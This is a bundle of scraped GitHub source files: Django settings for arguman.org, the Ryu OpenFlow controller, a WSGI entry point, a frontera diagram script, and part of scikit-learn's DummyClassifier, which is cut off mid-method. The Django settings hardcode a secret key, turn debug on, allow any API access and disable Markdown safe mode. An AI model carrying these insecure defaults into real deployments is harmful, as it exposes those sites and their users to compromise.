SECRET_KEY = 'qlp_henm3k-$7u@9b(@coqgpd1-2xmtox%a8_#*r9=0wh5d0oo'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'social_auth',
'django_gravatar',
'rest_framework',
'rest_framework.authtoken',
'profiles',
'premises',
'newsfeed',
'blog',
'api'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'main.urls'
WSGI_APPLICATION = 'main.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'tr-tr'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(os.path.dirname(__file__), "../static"),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), "../templates"),
)
# Social Auth Settings
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'django.contrib.auth.backends.ModelBackend',
)
AUTH_USER_MODEL = 'profiles.Profile'
# Rules
CONTENT_DELETION = {
'MAX_PREMISE_COUNT': 2,
'HAS_EMPTY_CONTENT_DELETION': True,
'LAST_DELETION_DATE': timedelta(hours=1)
}
TWITTER_CONSUMER_KEY = None # defined in settings_local.py
TWITTER_CONSUMER_SECRET = None # defined in settings_local.py
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.associate.associate_by_email',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
)
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.AllowAny'
],
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
#'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
),
'PAGINATE_BY': 10,
'PAGINATE_BY_PARAM': 'page_size',
'MAX_PAGINATE_BY': 100,
'UNICODE_JSON': False,
'DATETIME_FORMAT': '%d-%m-%Y %H:%M'  # %M = minutes (%m would repeat the month)
}
MONGODB_HOST = "localhost"
MONGODB_DATABASE = "arguman"
SITE_URL = "arguman.org"
# Markitup Settings
MARKITUP_SET = 'markitup/sets/markdown'
MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': False})
BLOG_FEED_TITLE = "Arguman.org Blog'u"
BLOG_FEED_DESCRIPTION = "Arguman analizi platformu"
BLOG_URL = "http://arguman.org/blog"
try:
from settings_local import *
except ImportError:
print "settings_local.py not found!"
| {
"content_hash": "56e1e51d77e0fb2a1cc44f071782ed12",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 71,
"avg_line_length": 25.63736263736264,
"alnum_prop": 0.7023146163737677,
"repo_name": "omeripek/arguman.org",
"id": "4178be4138f48728a4a4e7a656b242ef2715fc90",
"size": "4666",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/main/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "35248"
},
{
"name": "HTML",
"bytes": "43925"
},
{
"name": "JavaScript",
"bytes": "19834"
},
{
"name": "Python",
"bytes": "141271"
}
],
"symlink_target": ""
} |
__all__ = ["models", "views", "helpers"] | {
"content_hash": "db0b2cf1a1dc850641bc4b0a3d7fbccc",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 40,
"avg_line_length": 40,
"alnum_prop": 0.525,
"repo_name": "jackjennings/RoboToDo",
"id": "a4b005de89f5b0c14e9c6f6cbaf9d5db8f563a03",
"size": "40",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "RoboToDo.roboFontExt/lib/todo/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "930"
},
{
"name": "Python",
"bytes": "15535"
}
],
"symlink_target": ""
} |
"""
The main component of OpenFlow controller.
- Handle connections from switches
- Generate and route events to appropriate entities like Ryu applications
"""
import contextlib
import logging
import random
from socket import IPPROTO_TCP
from socket import TCP_NODELAY
from socket import SHUT_WR
from socket import timeout as SocketTimeout
import ssl
import sys
from ryu import cfg
from ryu.lib import hub
from ryu.lib.hub import StreamServer
import ryu.base.app_manager
from ryu.ofproto import ofproto_common
from ryu.ofproto import ofproto_parser
from ryu.ofproto import ofproto_protocol
from ryu.ofproto import ofproto_v1_0
from ryu.ofproto import nx_match
from ryu.controller import ofp_event
from ryu.controller.handler import HANDSHAKE_DISPATCHER, DEAD_DISPATCHER
from ryu.lib.dpid import dpid_to_str
from ryu.lib import ip
LOG = logging.getLogger('ryu.controller.controller')
DEFAULT_OFP_HOST = '0.0.0.0'
DEFAULT_OFP_SW_CON_INTERVAL = 1
CONF = cfg.CONF
CONF.register_cli_opts([
cfg.StrOpt('ofp-listen-host', default=DEFAULT_OFP_HOST,
help='openflow listen host (default %s)' % DEFAULT_OFP_HOST),
cfg.IntOpt('ofp-tcp-listen-port', default=None,
help='openflow tcp listen port '
'(default: %d)' % ofproto_common.OFP_TCP_PORT),
cfg.IntOpt('ofp-ssl-listen-port', default=None,
help='openflow ssl listen port '
'(default: %d)' % ofproto_common.OFP_SSL_PORT),
cfg.StrOpt('ctl-privkey', default=None, help='controller private key'),
cfg.StrOpt('ctl-cert', default=None, help='controller certificate'),
cfg.StrOpt('ca-certs', default=None, help='CA certificates'),
cfg.StrOpt('ciphers', default=None, help='list of ciphers to enable'),
cfg.ListOpt('ofp-switch-address-list', item_type=str, default=[],
help='list of IP address and port pairs (default empty). '
'e.g., "127.0.0.1:6653,[::1]:6653"'),
cfg.IntOpt('ofp-switch-connect-interval',
default=DEFAULT_OFP_SW_CON_INTERVAL,
help='interval in seconds to connect to switches '
'(default %d)' % DEFAULT_OFP_SW_CON_INTERVAL),
])
CONF.register_opts([
cfg.FloatOpt('socket-timeout',
default=5.0,
help='Time, in seconds, to await completion of socket operations.'),
cfg.FloatOpt('echo-request-interval',
default=15.0,
help='Time, in seconds, between sending echo requests to a datapath.'),
cfg.IntOpt('maximum-unreplied-echo-requests',
default=0,
min=0,
help='Maximum number of unreplied echo requests before datapath is disconnected.')
])
def _split_addr(addr):
"""
Splits a str of IP address and port pair into (host, port).
Example::
>>> _split_addr('127.0.0.1:6653')
('127.0.0.1', 6653)
>>> _split_addr('[::1]:6653')
('::1', 6653)
Raises ValueError if invalid format.
:param addr: A pair of IP address and port.
:return: IP address and port
"""
e = ValueError('Invalid IP address and port pair: "%s"' % addr)
pair = addr.rsplit(':', 1)
if len(pair) != 2:
raise e
addr, port = pair
if addr.startswith('[') and addr.endswith(']'):
addr = addr.lstrip('[').rstrip(']')
if not ip.valid_ipv6(addr):
raise e
elif not ip.valid_ipv4(addr):
raise e
return addr, int(port, 0)
class OpenFlowController(object):
def __init__(self):
super(OpenFlowController, self).__init__()
if not CONF.ofp_tcp_listen_port and not CONF.ofp_ssl_listen_port:
self.ofp_tcp_listen_port = ofproto_common.OFP_TCP_PORT
self.ofp_ssl_listen_port = ofproto_common.OFP_SSL_PORT
# For the backward compatibility, we spawn a server loop
# listening on the old OpenFlow listen port 6633.
hub.spawn(self.server_loop,
ofproto_common.OFP_TCP_PORT_OLD,
ofproto_common.OFP_SSL_PORT_OLD)
else:
self.ofp_tcp_listen_port = CONF.ofp_tcp_listen_port
self.ofp_ssl_listen_port = CONF.ofp_ssl_listen_port
# Example:
# self._clients = {
# ('127.0.0.1', 6653): <instance of StreamClient>,
# }
self._clients = {}
# entry point
def __call__(self):
# LOG.debug('call')
for address in CONF.ofp_switch_address_list:
addr = tuple(_split_addr(address))
self.spawn_client_loop(addr)
self.server_loop(self.ofp_tcp_listen_port,
self.ofp_ssl_listen_port)
def spawn_client_loop(self, addr, interval=None):
interval = interval or CONF.ofp_switch_connect_interval
client = hub.StreamClient(addr)
hub.spawn(client.connect_loop, datapath_connection_factory, interval)
self._clients[addr] = client
def stop_client_loop(self, addr):
client = self._clients.get(addr, None)
if client is not None:
client.stop()
def server_loop(self, ofp_tcp_listen_port, ofp_ssl_listen_port):
if CONF.ctl_privkey is not None and CONF.ctl_cert is not None:
if not hasattr(ssl, 'SSLContext'):
# Python versions below 2.7.9 support only TLSv1
# or lower, thus we choose TLSv1
ssl_args = {'ssl_version': ssl.PROTOCOL_TLSv1}
elif sys.version_info >= (3, 7,):
# On Python3.7+ we can't wrap an SSLContext due to this bug:
# https://github.com/eventlet/eventlet/issues/526
# Let's assume the system has a new enough OpenSSL that
# SSLv2/SSLv3 are disabled by default.
ssl_args = {'ssl_version': ssl.PROTOCOL_TLSv1}
else:
# From Python 2.7.9 and 3.4+, ssl context creation is
# supported. PROTOCOL_TLS (added in 2.7.13 and 3.5.3)
# replaced PROTOCOL_SSLv23; the functionality is similar.
if hasattr(ssl, 'PROTOCOL_TLS'):
p = 'PROTOCOL_TLS'
else:
p = 'PROTOCOL_SSLv23'
ssl_args = {'ssl_ctx': ssl.SSLContext(getattr(ssl, p))}
# Restrict non-safe versions
ssl_args['ssl_ctx'].options |= ssl.OP_NO_SSLv3 | ssl.OP_NO_SSLv2
if CONF.ciphers is not None:
ssl_args['ciphers'] = CONF.ciphers
if CONF.ca_certs is not None:
server = StreamServer((CONF.ofp_listen_host,
ofp_ssl_listen_port),
datapath_connection_factory,
keyfile=CONF.ctl_privkey,
certfile=CONF.ctl_cert,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=CONF.ca_certs, **ssl_args)
else:
server = StreamServer((CONF.ofp_listen_host,
ofp_ssl_listen_port),
datapath_connection_factory,
keyfile=CONF.ctl_privkey,
certfile=CONF.ctl_cert, **ssl_args)
else:
server = StreamServer((CONF.ofp_listen_host,
ofp_tcp_listen_port),
datapath_connection_factory)
# LOG.debug('loop')
server.serve_forever()
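# _deactivate wraps a Datapath method so that the datapath's socket is
# always closed when the wrapped method returns or raises; an IOError
# from an already-closed socket is ignored.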
def _deactivate(method):
def deactivate(self):
try:
method(self)
finally:
try:
self.socket.close()
except IOError:
pass
return deactivate
class Datapath(ofproto_protocol.ProtocolDesc):
"""
A class to describe an OpenFlow switch connected to this controller.
An instance has the following attributes.
.. tabularcolumns:: |l|L|
==================================== ======================================
Attribute Description
==================================== ======================================
id 64-bit OpenFlow Datapath ID.
Only available for
ryu.controller.handler.MAIN_DISPATCHER
phase.
ofproto A module which exports OpenFlow
definitions, mainly constants appeared
in the specification, for the
negotiated OpenFlow version. For
example, ryu.ofproto.ofproto_v1_0 for
OpenFlow 1.0.
ofproto_parser A module which exports OpenFlow wire
message encoder and decoder for the
negotiated OpenFlow version.
For example,
ryu.ofproto.ofproto_v1_0_parser
for OpenFlow 1.0.
ofproto_parser.OFPxxxx(datapath,...) A callable to prepare an OpenFlow
message for the given switch. It can
be sent with Datapath.send_msg later.
xxxx is a name of the message. For
example OFPFlowMod for flow-mod
message. Arguments depend on the
message.
set_xid(self, msg) Generate an OpenFlow XID and put it
in msg.xid.
send_msg(self, msg) Queue an OpenFlow message to send to
the corresponding switch. If msg.xid
is None, set_xid is automatically
called on the message before queueing.
send_packet_out deprecated
send_flow_mod deprecated
send_flow_del deprecated
send_delete_all_flows deprecated
send_barrier Queue an OpenFlow barrier message to
send to the switch.
send_nxt_set_flow_format deprecated
is_reserved_port deprecated
==================================== ======================================
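A hedged usage sketch (assumes a datapath ``dp`` negotiated as OpenFlow
1.3 and a PacketIn message ``msg``; both names are illustrative)::

    ofp = dp.ofproto
    parser = dp.ofproto_parser
    actions = [parser.OFPActionOutput(ofp.OFPP_FLOOD)]
    out = parser.OFPPacketOut(datapath=dp, buffer_id=msg.buffer_id,
                              in_port=msg.match['in_port'],
                              actions=actions)
    dp.send_msg(out)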
"""
def __init__(self, socket, address):
super(Datapath, self).__init__()
self.socket = socket
self.socket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
self.socket.settimeout(CONF.socket_timeout)
self.address = address
self.is_active = True
# The limit is arbitrary. We need to limit queue size to
# prevent it from eating memory up.
self.send_q = hub.Queue(16)
self._send_q_sem = hub.BoundedSemaphore(self.send_q.maxsize)
self.echo_request_interval = CONF.echo_request_interval
self.max_unreplied_echo_requests = CONF.maximum_unreplied_echo_requests
self.unreplied_echo_requests = []
self.xid = random.randint(0, self.ofproto.MAX_XID)
self.id = None # datapath_id is unknown yet
self._ports = None
self.flow_format = ofproto_v1_0.NXFF_OPENFLOW10
self.ofp_brick = ryu.base.app_manager.lookup_service_brick('ofp_event')
self.state = None # for pylint
self.set_state(HANDSHAKE_DISPATCHER)
def _close_write(self):
# Note: Close only further sends in order to wait for the switch to
# disconnect this connection.
try:
self.socket.shutdown(SHUT_WR)
except (EOFError, IOError):
pass
def close(self):
self.set_state(DEAD_DISPATCHER)
self._close_write()
def set_state(self, state):
if self.state == state:
return
self.state = state
ev = ofp_event.EventOFPStateChange(self)
ev.state = state
self.ofp_brick.send_event_to_observers(ev, state)
# Low level socket handling layer
@_deactivate
def _recv_loop(self):
buf = bytearray()
count = 0
min_read_len = remaining_read_len = ofproto_common.OFP_HEADER_SIZE
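# Framing: read at least one OpenFlow header (OFP_HEADER_SIZE, 8 bytes)
# to learn msg_len, then keep reading until the complete message is
# buffered before parsing it.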
while self.state != DEAD_DISPATCHER:
try:
read_len = min_read_len
if remaining_read_len > min_read_len:
read_len = remaining_read_len
ret = self.socket.recv(read_len)
except SocketTimeout:
continue
except ssl.SSLError:
# eventlet throws SSLError (which is a subclass of IOError)
# on SSL socket read timeout; re-try the loop in this case.
continue
except (EOFError, IOError):
break
if not ret:
break
buf += ret
buf_len = len(buf)
while buf_len >= min_read_len:
(version, msg_type, msg_len, xid) = ofproto_parser.header(buf)
if msg_len < min_read_len:
# Someone isn't playing nicely; log it, and try something sane.
LOG.debug("Message with invalid length %s received from switch at address %s",
msg_len, self.address)
msg_len = min_read_len
if buf_len < msg_len:
remaining_read_len = (msg_len - buf_len)
break
msg = ofproto_parser.msg(
self, version, msg_type, msg_len, xid, buf[:msg_len])
# LOG.debug('queue msg %s cls %s', msg, msg.__class__)
if msg:
ev = ofp_event.ofp_msg_to_ev(msg)
self.ofp_brick.send_event_to_observers(ev, self.state)
def dispatchers(x):
return x.callers[ev.__class__].dispatchers
handlers = [handler for handler in
self.ofp_brick.get_handlers(ev) if
self.state in dispatchers(handler)]
for handler in handlers:
handler(ev)
buf = buf[msg_len:]
buf_len = len(buf)
remaining_read_len = min_read_len
# We need to schedule other greenlets. Otherwise, ryu
# can't accept new switches or handle the existing
# switches. The limit is arbitrary. We need the better
# approach in the future.
count += 1
if count > 2048:
count = 0
hub.sleep(0)
def _send_loop(self):
try:
while self.state != DEAD_DISPATCHER:
buf, close_socket = self.send_q.get()
self._send_q_sem.release()
self.socket.sendall(buf)
if close_socket:
break
except SocketTimeout:
LOG.debug("Socket timed out while sending data to switch at address %s",
self.address)
except IOError as ioe:
# Convert ioe.errno to a string, just in case it was somehow set to None.
errno = "%s" % ioe.errno
LOG.debug("Socket error while sending data to switch at address %s: [%s] %s",
self.address, errno, ioe.strerror)
finally:
q = self.send_q
# First, clear self.send_q to prevent new references.
self.send_q = None
# Now, drain the send_q, releasing the associated semaphore for each entry.
# This should release all threads waiting to acquire the semaphore.
try:
while q.get(block=False):
self._send_q_sem.release()
except hub.QueueEmpty:
pass
# Finally, disallow further sends.
self._close_write()
def send(self, buf, close_socket=False):
msg_enqueued = False
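# Backpressure: the semaphore counts free slots in send_q. acquire()
# blocks the caller once 16 messages are queued; _send_loop releases
# one slot per message it drains (or per entry discarded at shutdown).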
self._send_q_sem.acquire()
if self.send_q:
self.send_q.put((buf, close_socket))
msg_enqueued = True
else:
self._send_q_sem.release()
if not msg_enqueued:
LOG.debug('Datapath in process of terminating; send() to %s discarded.',
self.address)
return msg_enqueued
def set_xid(self, msg):
self.xid += 1
self.xid &= self.ofproto.MAX_XID
msg.set_xid(self.xid)
return self.xid
def send_msg(self, msg, close_socket=False):
assert isinstance(msg, self.ofproto_parser.MsgBase)
if msg.xid is None:
self.set_xid(msg)
msg.serialize()
# LOG.debug('send_msg %s', msg)
return self.send(msg.buf, close_socket=close_socket)
def _echo_request_loop(self):
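# Liveness check: periodically send an echo request and remember its
# xid; replies are removed in acknowledge_echo_reply(). Once more than
# max_unreplied_echo_requests xids pile up, the datapath is assumed
# dead and the connection is closed.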
if not self.max_unreplied_echo_requests:
return
while (self.send_q and
(len(self.unreplied_echo_requests) <= self.max_unreplied_echo_requests)):
echo_req = self.ofproto_parser.OFPEchoRequest(self)
self.unreplied_echo_requests.append(self.set_xid(echo_req))
self.send_msg(echo_req)
hub.sleep(self.echo_request_interval)
self.close()
def acknowledge_echo_reply(self, xid):
try:
self.unreplied_echo_requests.remove(xid)
except ValueError:
pass
def serve(self):
send_thr = hub.spawn(self._send_loop)
# send hello message immediately
hello = self.ofproto_parser.OFPHello(self)
self.send_msg(hello)
echo_thr = hub.spawn(self._echo_request_loop)
try:
self._recv_loop()
finally:
hub.kill(send_thr)
hub.kill(echo_thr)
hub.joinall([send_thr, echo_thr])
self.is_active = False
#
# Utility methods for convenience
#
def send_packet_out(self, buffer_id=0xffffffff, in_port=None,
actions=None, data=None):
if in_port is None:
in_port = self.ofproto.OFPP_NONE
packet_out = self.ofproto_parser.OFPPacketOut(
self, buffer_id, in_port, actions, data)
self.send_msg(packet_out)
def send_flow_mod(self, rule, cookie, command, idle_timeout, hard_timeout,
priority=None, buffer_id=0xffffffff,
out_port=None, flags=0, actions=None):
if priority is None:
priority = self.ofproto.OFP_DEFAULT_PRIORITY
if out_port is None:
out_port = self.ofproto.OFPP_NONE
flow_format = rule.flow_format()
assert (flow_format == ofproto_v1_0.NXFF_OPENFLOW10 or
flow_format == ofproto_v1_0.NXFF_NXM)
if self.flow_format < flow_format:
self.send_nxt_set_flow_format(flow_format)
if flow_format == ofproto_v1_0.NXFF_OPENFLOW10:
match_tuple = rule.match_tuple()
match = self.ofproto_parser.OFPMatch(*match_tuple)
flow_mod = self.ofproto_parser.OFPFlowMod(
self, match, cookie, command, idle_timeout, hard_timeout,
priority, buffer_id, out_port, flags, actions)
else:
flow_mod = self.ofproto_parser.NXTFlowMod(
self, cookie, command, idle_timeout, hard_timeout,
priority, buffer_id, out_port, flags, rule, actions)
self.send_msg(flow_mod)
def send_flow_del(self, rule, cookie, out_port=None):
self.send_flow_mod(rule=rule, cookie=cookie,
command=self.ofproto.OFPFC_DELETE,
idle_timeout=0, hard_timeout=0, priority=0,
out_port=out_port)
def send_delete_all_flows(self):
rule = nx_match.ClsRule()
self.send_flow_mod(
rule=rule, cookie=0, command=self.ofproto.OFPFC_DELETE,
idle_timeout=0, hard_timeout=0, priority=0, buffer_id=0,
out_port=self.ofproto.OFPP_NONE, flags=0, actions=None)
def send_barrier(self):
barrier_request = self.ofproto_parser.OFPBarrierRequest(self)
return self.send_msg(barrier_request)
def send_nxt_set_flow_format(self, flow_format):
assert (flow_format == ofproto_v1_0.NXFF_OPENFLOW10 or
flow_format == ofproto_v1_0.NXFF_NXM)
if self.flow_format == flow_format:
# Nothing to do
return
self.flow_format = flow_format
set_format = self.ofproto_parser.NXTSetFlowFormat(self, flow_format)
# FIXME: If NXT_SET_FLOW_FORMAT or NXFF_NXM is not supported by
# the switch then an error message will be received. It may be
# handled by setting self.flow_format to
# ofproto_v1_0.NXFF_OPENFLOW10 but currently isn't.
self.send_msg(set_format)
self.send_barrier()
def is_reserved_port(self, port_no):
return port_no > self.ofproto.OFPP_MAX
def datapath_connection_factory(socket, address):
LOG.debug('connected socket:%s address:%s', socket, address)
with contextlib.closing(Datapath(socket, address)) as datapath:
try:
datapath.serve()
except:
# Something went wrong.
# Especially malicious switch can send malformed packet,
# the parser raise exception.
# Can we do anything more graceful?
if datapath.id is None:
dpid_str = "%s" % datapath.id
else:
dpid_str = dpid_to_str(datapath.id)
LOG.error("Error in the datapath %s from %s", dpid_str, address)
raise
| {
"content_hash": "1dc608793c39be5ab30cb0d8d9420303",
"timestamp": "",
"source": "github",
"line_count": 557,
"max_line_length": 98,
"avg_line_length": 39.876122082585276,
"alnum_prop": 0.5354103822430327,
"repo_name": "osrg/ryu",
"id": "d79f290add05406f8f12aed94a9766b7afe756f7",
"size": "22900",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ryu/controller/controller.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28540"
},
{
"name": "CSS",
"bytes": "306"
},
{
"name": "Erlang",
"bytes": "874721"
},
{
"name": "Gnuplot",
"bytes": "1094"
},
{
"name": "HTML",
"bytes": "306"
},
{
"name": "JavaScript",
"bytes": "8436"
},
{
"name": "Makefile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "6137808"
},
{
"name": "Shell",
"bytes": "17573"
}
],
"symlink_target": ""
} |
"""
WSGI config for m_explorer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "m_explorer.settings")
application = get_wsgi_application()
| {
"content_hash": "0a06a333e0d7b3517ed7e70d0dcad89c",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.8125,
"alnum_prop": 0.7682619647355163,
"repo_name": "marvel-explorer/marvel-explorer",
"id": "ecf89f030fca363d7cde5cc0826332f14aa2a61c",
"size": "397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "m_explorer/m_explorer/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1713816"
}
],
"symlink_target": ""
} |
import os
import sys
from manager import CrawlGraphManager
from data import GRAPHS
SCRIPT_FOLDER = os.path.abspath(os.path.split(sys.argv[0])[0])
CHARTS_FOLDER = os.path.join(SCRIPT_FOLDER, 'diagrams')
def generate_filename(graph_name):
name = graph_name
name = name.replace(' ', '_')
name = name.lower()
name = '%s.png' % name
return name
def generate_graph_diagram(filename, title, graph):
print "generating png diagram for test '%s'..." % title
manager = CrawlGraphManager()
manager.add_site_list(graph)
manager.render(filename, label=title, use_urls=graph.use_urls)
def generate_diagrams():
for graph in GRAPHS:
generate_graph_diagram(filename=os.path.join(CHARTS_FOLDER, generate_filename(graph.name)),
title=graph.name,
graph=graph)
if __name__ == '__main__':
generate_diagrams()
| {
"content_hash": "d1947773ffd5948376e1df20e05559a0",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 99,
"avg_line_length": 19.638297872340427,
"alnum_prop": 0.6338028169014085,
"repo_name": "RajatGoyal/frontera",
"id": "17a64fb9b773f40db17a62bf44dd16cbce7e0c5e",
"size": "923",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "frontera/utils/graphs/generate_diagrams.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "210178"
}
],
"symlink_target": ""
} |
import logging
LOGGER = logging.getLogger("metric")
| {
"content_hash": "3e0d1942b9c618a80d7df41f89d313a8",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 17.666666666666668,
"alnum_prop": 0.7735849056603774,
"repo_name": "sloe/metric",
"id": "6fbe632d01ccdf82804f287ba30afab4d58562b0",
"size": "54",
"binary": false,
"copies": "1",
"ref": "refs/heads/metric",
"path": "models/4_logger.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "66779"
},
{
"name": "HTML",
"bytes": "41309"
},
{
"name": "JavaScript",
"bytes": "2355558"
},
{
"name": "Python",
"bytes": "353712"
},
{
"name": "Shell",
"bytes": "2977"
}
],
"symlink_target": ""
} |
from __future__ import division
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .utils import check_random_state
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.random import random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
class DummyClassifier(BaseEstimator, ClassifierMixin):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use.
constant : int or str or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : array or list of array of shape = [n_classes]
Class labels for each output.
n_classes_ : array or list of array of shape = [n_classes]
Number of labels for each output.
class_prior_ : array or list of array of shape = [n_classes]
Probability of each class for each output.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
`sparse_output_` : bool,
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
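Examples
--------
A minimal usage sketch; the data values below are illustrative only.

>>> import numpy as np
>>> X = np.zeros((4, 1))  # features are ignored by the dummy rules
>>> y = np.array([0, 0, 0, 1])
>>> clf = DummyClassifier(strategy="most_frequent")
>>> clf.fit(X, y).predict(X)
array([0, 0, 0, 0])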
"""
def __init__(self, strategy="stratified", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("most_frequent", "stratified", "uniform",
"constant"):
raise ValueError("Unknown strategy type.")
if self.strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.atleast_1d(y)
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if self.strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if (self.strategy == "constant" and
any(constant[k] not in self.classes_[k]
for k in range(self.n_outputs_))):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
raise ValueError("The constant target value must be "
"present in training data")
if self.n_outputs_ == 1 and not self.output_2d_:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""
Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self.strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self.strategy == "most_frequent":
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self.strategy == "stratified":
class_prob = class_prior_
elif self.strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self.strategy == "constant":
